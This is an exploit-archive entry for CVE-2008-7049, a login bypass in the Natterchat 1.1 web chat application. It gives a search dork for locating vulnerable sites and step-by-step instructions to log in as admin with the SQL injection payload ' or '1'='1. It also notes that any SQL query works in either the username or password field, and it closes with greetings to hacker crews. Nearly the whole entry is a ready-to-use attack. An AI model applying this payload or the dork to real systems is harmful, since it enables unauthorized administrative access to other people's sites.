Natterchat 1.1 - Authentication Bypass

Author: Bl@ckbe@rD
type: webapps
platform: php
port: 
date_added: 2008-11-19  
date_updated: 2017-01-03  
verified: 1  
codes: OSVDB-57349;CVE-2008-7049  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 7172.txt  

[+] Script Name         : NATTERCHAT v1.1 remote login bypass

[+] Author         : Bl@ckbe@rD ('Tunisian TerrorisT')

[+] Contact        : blackbeard-sql[A.T]hotmail{.}fr ;

[+] Dork           : Powered by NATTERCHAT v 1.1

--//-->

[+] Expl0iT :

1) Go to the Login page http://www.exemple.ff/chat/nattechat/home.asp

2) Username : admin

   Password : ' or '1'='1

3) You are the Admin now!

N.B : U can aplly an SQL query in both (Username or Password) but we done only ' or '1'='1 coz it's always true then we can simply bypass the login page


--//-->

[+] Greetz : hak3r-b0y , Underz0ne Crew , king Of Hacker , Zigma , micro0x02 ...

# milw0rm.com [2008-11-20]